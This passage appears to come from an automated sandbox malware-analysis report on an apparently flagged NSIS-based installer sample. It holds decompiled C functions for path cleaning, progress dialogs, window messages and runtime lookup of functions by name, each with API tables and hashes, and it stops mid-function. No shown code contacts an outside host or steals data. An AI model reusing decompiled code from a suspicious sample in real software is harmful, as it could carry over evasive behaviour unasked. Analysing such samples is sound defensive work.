                                                                        				void* _t39;
                                                                        				void* _t41;
                                                                        				signed char* _t42;
                                                                        				signed char* _t51;
                                                                        				void* _t52;
                                                                        				void* _t54;
                                                                        
                                                                        				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                        				while(1) {
                                                                        					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                        					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                        					_t52 = _t51[0x18];
                                                                        					if(_t52 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					_t41 = 0x1a;
                                                                        					if(_t52 == _t41) {
                                                                        						goto L9;
                                                                        					}
                                                                        					if(_t52 != 0xffffffff) {
                                                                        						if(_t52 <= 0 || _t52 > 0x19) {
                                                                        							_t51[0x18] = _t41;
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t37 = E7249135A(_t52 - 1);
                                                                        							L10:
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = E724912E3();
                                                                        						L11:
                                                                        						_t52 = _t37;
                                                                        						L12:
                                                                        						_t13 =  &(_t51[8]); // 0x1020
                                                                        						_t42 = _t13;
                                                                        						if(_t51[4] >= 0) {
                                                                        						}
                                                                        						_t38 =  *_t51 & 0x000000ff;
                                                                        						_t51[0x1c] = 0;
                                                                        						if(_t38 > 7) {
                                                                        							L27:
                                                                        							_t39 = GlobalFree(_t52);
                                                                        							if( *(_t54 + 0x10) == 0) {
                                                                        								return _t39;
                                                                        							}
                                                                        							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                        							} else {
                                                                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                        							}
                                                                        							continue;
                                                                        						} else {
                                                                        							switch( *((intOrPtr*)(_t38 * 4 +  &M724925F8))) {
                                                                        								case 0:
                                                                        									 *_t42 = 0;
                                                                        									goto L27;
                                                                        								case 1:
                                                                        									__eax = E724913B1(__ebp);
                                                                        									goto L21;
                                                                        								case 2:
                                                                        									 *__edi = E724913B1(__ebp);
                                                                        									__edi[1] = __edx;
                                                                        									goto L27;
                                                                        								case 3:
                                                                        									__eax = GlobalAlloc(0x40,  *0x7249506c);
                                                                        									 *(__esi + 0x1c) = __eax;
                                                                        									__edx = 0;
                                                                        									 *__edi = __eax;
                                                                        									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7249506c, __eax,  *0x7249506c, 0, 0);
                                                                        									goto L27;
                                                                        								case 4:
                                                                        									__eax = E724912CC(__ebp);
                                                                        									 *(__esi + 0x1c) = __eax;
                                                                        									L21:
                                                                        									 *__edi = __eax;
                                                                        									goto L27;
                                                                        								case 5:
                                                                        									__eax = GlobalAlloc(0x40, 0x10);
                                                                        									_push(__eax);
                                                                        									 *(__esi + 0x1c) = __eax;
                                                                        									_push(__ebp);
                                                                        									 *__edi = __eax;
                                                                        									__imp__CLSIDFromString();
                                                                        									goto L27;
                                                                        								case 6:
                                                                        									if( *__ebp != __cx) {
                                                                        										__eax = E724913B1(__ebp);
                                                                        										 *__ebx = __eax;
                                                                        									}
                                                                        									goto L27;
                                                                        								case 7:
                                                                        									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                        									( *(__esi + 0x18) - 1) *  *0x7249506c =  *0x72495074 + ( *(__esi + 0x18) - 1) *  *0x7249506c * 2 + 0x18;
                                                                        									 *__ebx =  *0x72495074 + ( *(__esi + 0x18) - 1) *  *0x7249506c * 2 + 0x18;
                                                                        									asm("cdq");
                                                                        									__eax = E72491510(__edx,  *0x72495074 + ( *(__esi + 0x18) - 1) *  *0x7249506c * 2 + 0x18, __edx,  *0x72495074 + ( *(__esi + 0x18) - 1) *  *0x7249506c * 2);
                                                                        									goto L27;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L9:
                                                                        					_t37 = E724912CC(0x72495044);
                                                                        					goto L10;
                                                                        				}
                                                                        			}











                                                                        0x72492494
                                                                        0x72492498
                                                                        0x724924a3
                                                                        0x724924a3
                                                                        0x724924aa
                                                                        0x724924af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724924b3
                                                                        0x724924b6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724924bb
                                                                        0x724924c6
                                                                        0x724924d6
                                                                        0x00000000
                                                                        0x724924cd
                                                                        0x724924cf
                                                                        0x724924e5
                                                                        0x00000000
                                                                        0x724924e5
                                                                        0x724924bd
                                                                        0x724924bd
                                                                        0x724924e6
                                                                        0x724924e6
                                                                        0x724924e8
                                                                        0x724924ec
                                                                        0x724924ec
                                                                        0x724924ef
                                                                        0x724924ef
                                                                        0x724924f7
                                                                        0x724924ff
                                                                        0x72492502
                                                                        0x724925c1
                                                                        0x724925c2
                                                                        0x724925cd
                                                                        0x724925f7
                                                                        0x724925f7
                                                                        0x724925dd
                                                                        0x724925e9
                                                                        0x724925df
                                                                        0x724925df
                                                                        0x724925df
                                                                        0x00000000
                                                                        0x72492508
                                                                        0x72492508
                                                                        0x00000000
                                                                        0x7249250f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492517
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492525
                                                                        0x72492527
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492548
                                                                        0x7249254e
                                                                        0x72492551
                                                                        0x72492553
                                                                        0x72492563
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492530
                                                                        0x72492535
                                                                        0x72492538
                                                                        0x72492539
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x7249256f
                                                                        0x72492575
                                                                        0x72492576
                                                                        0x72492579
                                                                        0x7249257a
                                                                        0x7249257c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492588
                                                                        0x7249258b
                                                                        0x72492597
                                                                        0x72492599
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724925a5
                                                                        0x724925b1
                                                                        0x724925b4
                                                                        0x724925b6
                                                                        0x724925b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492508
                                                                        0x72492502
                                                                        0x724924db
                                                                        0x724924e0
                                                                        0x00000000
                                                                        0x724924e0

                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 724925C2
                                                                          • Part of subcall function 724912CC: lstrcpynW.KERNEL32(00000000,?,7249137F,00000019,724911CA,-000000A0), ref: 724912DC
                                                                        • GlobalAlloc.KERNEL32(00000040), ref: 72492548
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 72492563
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                        • String ID: @hv
                                                                        • API String ID: 4216380887-3217783804
                                                                        • Opcode ID: 86d907b1ace3d1cd54f95793a8863340f243452253909bda1812011b04ce7012
                                                                        • Instruction ID: 95067888f87e6ee5f50e18aeace0c77713671a95ba07c073383edf6f33bb1816
                                                                        • Opcode Fuzzy Hash: 86d907b1ace3d1cd54f95793a8863340f243452253909bda1812011b04ce7012
                                                                        • Instruction Fuzzy Hash: 0841DEB1048305EFD728DF29D854A267FF8FB54320F21891DE4CADA680E730A595CBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E004068EF(WCHAR* _a4) {
                                                                        				short _t5;
                                                                        				short _t7;
                                                                        				WCHAR* _t19;
                                                                        				WCHAR* _t20;
                                                                        				WCHAR* _t21;
                                                                        
                                                                        				_t20 = _a4;
                                                                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                        					_t20 =  &(_t20[4]);
                                                                        				}
                                                                        				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                                        					_t20 =  &(_t20[2]);
                                                                        				}
                                                                        				_t5 =  *_t20;
                                                                        				_t21 = _t20;
                                                                        				_t19 = _t20;
                                                                        				if(_t5 != 0) {
                                                                        					do {
                                                                        						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                                        							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                        							_t19 = CharNextW(_t19);
                                                                        						}
                                                                        						_t20 = CharNextW(_t20);
                                                                        						_t5 =  *_t20;
                                                                        					} while (_t5 != 0);
                                                                        				}
                                                                        				 *_t19 =  *_t19 & 0x00000000;
                                                                        				while(1) {
                                                                        					_push(_t19);
                                                                        					_push(_t21);
                                                                        					_t19 = CharPrevW();
                                                                        					_t7 =  *_t19;
                                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                        						break;
                                                                        					}
                                                                        					 *_t19 =  *_t19 & 0x00000000;
                                                                        					if(_t21 < _t19) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t7;
                                                                        			}








                                                                        0x004068f1
                                                                        0x004068fa
                                                                        0x00406911
                                                                        0x00406911
                                                                        0x00406918
                                                                        0x00406924
                                                                        0x00406924
                                                                        0x00406927
                                                                        0x0040692a
                                                                        0x0040692f
                                                                        0x00406931
                                                                        0x0040693a
                                                                        0x0040693e
                                                                        0x0040695b
                                                                        0x00406963
                                                                        0x00406963
                                                                        0x00406968
                                                                        0x0040696a
                                                                        0x0040696d
                                                                        0x00406972
                                                                        0x00406973
                                                                        0x00406977
                                                                        0x00406977
                                                                        0x00406978
                                                                        0x0040697f
                                                                        0x00406981
                                                                        0x00406988
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406990
                                                                        0x00406996
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406996
                                                                        0x0040699b

                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                        • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                        • CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                        • CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-826357637
                                                                        • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                        • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                        • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                        • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040302E(intOrPtr _a4) {
                                                                        				short _v132;
                                                                        				long _t6;
                                                                        				struct HWND__* _t7;
                                                                        				struct HWND__* _t15;
                                                                        
                                                                        				if(_a4 != 0) {
                                                                        					_t15 =  *0x420efc; // 0x0
                                                                        					if(_t15 != 0) {
                                                                        						_t15 = DestroyWindow(_t15);
                                                                        					}
                                                                        					 *0x420efc = 0;
                                                                        					return _t15;
                                                                        				}
                                                                        				__eflags =  *0x420efc; // 0x0
                                                                        				if(__eflags != 0) {
                                                                        					return E00406A71(0);
                                                                        				}
                                                                        				_t6 = GetTickCount();
                                                                        				__eflags = _t6 -  *0x42a26c;
                                                                        				if(_t6 >  *0x42a26c) {
                                                                        					__eflags =  *0x42a268;
                                                                        					if( *0x42a268 == 0) {
                                                                        						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                                        						 *0x420efc = _t7;
                                                                        						return ShowWindow(_t7, 5);
                                                                        					}
                                                                        					__eflags =  *0x42a314 & 0x00000001;
                                                                        					if(( *0x42a314 & 0x00000001) != 0) {
                                                                        						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                                        						return E004056CA(0,  &_v132);
                                                                        					}
                                                                        				}
                                                                        				return _t6;
                                                                        			}







                                                                        0x0040303d
                                                                        0x0040303f
                                                                        0x00403046
                                                                        0x00403049
                                                                        0x00403049
                                                                        0x0040304f
                                                                        0x00000000
                                                                        0x0040304f
                                                                        0x00403057
                                                                        0x0040305d
                                                                        0x00000000
                                                                        0x00403060
                                                                        0x00403067
                                                                        0x0040306d
                                                                        0x00403073
                                                                        0x00403075
                                                                        0x0040307b
                                                                        0x004030b9
                                                                        0x004030c2
                                                                        0x00000000
                                                                        0x004030c7
                                                                        0x0040307d
                                                                        0x00403084
                                                                        0x00403095
                                                                        0x00000000
                                                                        0x004030a3
                                                                        0x00403084
                                                                        0x004030cf

                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                        • GetTickCount.KERNEL32 ref: 00403067
                                                                        • wsprintfW.USER32 ref: 00403095
                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,004030A8), ref: 00405725
                                                                          • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll), ref: 00405737
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                        • CreateDialogParamW.USER32 ref: 004030B9
                                                                        • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                          • Part of subcall function 00403012: MulDiv.KERNEL32(00000000,00000064,00001425), ref: 00403027
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                        • String ID: ... %d%%
                                                                        • API String ID: 722711167-2449383134
                                                                        • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                        • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                        • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                        • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                        				long _v8;
                                                                        				signed char _v12;
                                                                        				unsigned int _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				long _v56;
                                                                        				void* _v60;
                                                                        				long _t15;
                                                                        				unsigned int _t19;
                                                                        				signed int _t25;
                                                                        				struct HWND__* _t28;
                                                                        
                                                                        				_t28 = _a4;
                                                                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                        				if(_a8 == 0) {
                                                                        					L4:
                                                                        					_v56 = _t15;
                                                                        					_v60 = 4;
                                                                        					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                        					return _v24;
                                                                        				}
                                                                        				_t19 = GetMessagePos();
                                                                        				_v16 = _t19 >> 0x10;
                                                                        				_v20 = _t19;
                                                                        				ScreenToClient(_t28,  &_v20);
                                                                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                        				if((_v12 & 0x00000066) != 0) {
                                                                        					_t15 = _v8;
                                                                        					goto L4;
                                                                        				}
                                                                        				return _t25 | 0xffffffff;
                                                                        			}














                                                                        0x00404f8d
                                                                        0x00404f9a
                                                                        0x00404fa0
                                                                        0x00404fde
                                                                        0x00404fde
                                                                        0x00404fed
                                                                        0x00404ff4
                                                                        0x00000000
                                                                        0x00404ff6
                                                                        0x00404fa2
                                                                        0x00404fb1
                                                                        0x00404fb9
                                                                        0x00404fbc
                                                                        0x00404fce
                                                                        0x00404fd4
                                                                        0x00404fdb
                                                                        0x00000000
                                                                        0x00404fdb
                                                                        0x00000000

                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                        • GetMessagePos.USER32 ref: 00404FA2
                                                                        • ScreenToClient.USER32 ref: 00404FBC
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                        • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                        • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E724916BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                        				_Unknown_base(*)()* _t7;
                                                                        				void* _t10;
                                                                        				int _t14;
                                                                        
                                                                        				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                        				_t10 = GlobalAlloc(0x40, _t14);
                                                                        				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                        				_t7 = GetProcAddress(_a4, _t10);
                                                                        				GlobalFree(_t10);
                                                                        				return _t7;
                                                                        			}






                                                                        0x724916d7
                                                                        0x724916e3
                                                                        0x724916f0
                                                                        0x724916f7
                                                                        0x72491700
                                                                        0x7249170c

                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,724922D8,?,00000808), ref: 724916D5
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,724922D8,?,00000808), ref: 724916DC
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,724922D8,?,00000808), ref: 724916F0
                                                                        • GetProcAddress.KERNEL32(724922D8,00000000), ref: 724916F7
                                                                        • GlobalFree.KERNEL32 ref: 72491700
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                        • String ID: Nv@hv
                                                                        • API String ID: 1148316912-4226514844
                                                                        • Opcode ID: f765c9a2871c171b70c0a7521fad11e1e091d600531365462b7b4cc040327d18
                                                                        • Instruction ID: c4b399f6721d56b844a2f010450b5beb0d083c6ff80aa510c8d0fdff0282d2ab
                                                                        • Opcode Fuzzy Hash: f765c9a2871c171b70c0a7521fad11e1e091d600531365462b7b4cc040327d18
                                                                        • Instruction Fuzzy Hash: 29F01C732461387BD6201AA7CC4CDABBE9CDF9B2F5B210615F668A219086614C01DBF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                        				short _v132;
                                                                        				void* _t11;
                                                                        				WCHAR* _t19;
                                                                        
                                                                        				if(_a8 == 0x110) {
                                                                        					SetTimer(_a4, 1, 0xfa, 0);
                                                                        					_a8 = 0x113;
                                                                        				}
                                                                        				if(_a8 == 0x113) {
                                                                        					_t11 = E00403012();
                                                                        					_t19 = L"unpacking data: %d%%";
                                                                        					if( *0x42a270 == 0) {
                                                                        						_t19 = L"verifying installer: %d%%";
                                                                        					}
                                                                        					wsprintfW( &_v132, _t19, _t11);
                                                                        					SetWindowTextW(_a4,  &_v132);
                                                                        					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                        				}
                                                                        				return 0;
                                                                        			}






                                                                        0x00402fa3
                                                                        0x00402fb1
                                                                        0x00402fb7
                                                                        0x00402fb7
                                                                        0x00402fc5
                                                                        0x00402fc7
                                                                        0x00402fd3
                                                                        0x00402fd8
                                                                        0x00402fda
                                                                        0x00402fda
                                                                        0x00402fe5
                                                                        0x00402ff5
                                                                        0x00403007
                                                                        0x00403007
                                                                        0x0040300f

                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                        • wsprintfW.USER32 ref: 00402FE5
                                                                        • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                        • SetDlgItemTextW.USER32 ref: 00403007
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                        • API String ID: 1451636040-1158693248
                                                                        • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                        • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                        • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                        • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E72492655() {
                                                                        				intOrPtr _t24;
                                                                        				void* _t26;
                                                                        				intOrPtr _t27;
                                                                        				signed int _t39;
                                                                        				void* _t40;
                                                                        				void* _t43;
                                                                        				intOrPtr _t44;
                                                                        				void* _t45;
                                                                        
                                                                        				_t40 = E724912BB();
                                                                        				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                        				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                        				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                        				do {
                                                                        					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                        					}
                                                                        					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                        					if(_t39 <= 7) {
                                                                        						switch( *((intOrPtr*)(_t39 * 4 +  &M72492784))) {
                                                                        							case 0:
                                                                        								 *_t40 = 0;
                                                                        								goto L17;
                                                                        							case 1:
                                                                        								__eax =  *__eax;
                                                                        								if(__ecx > __ebx) {
                                                                        									 *(__esp + 0x10) = __ecx;
                                                                        									__ecx =  *(0x7249407c + __edx * 4);
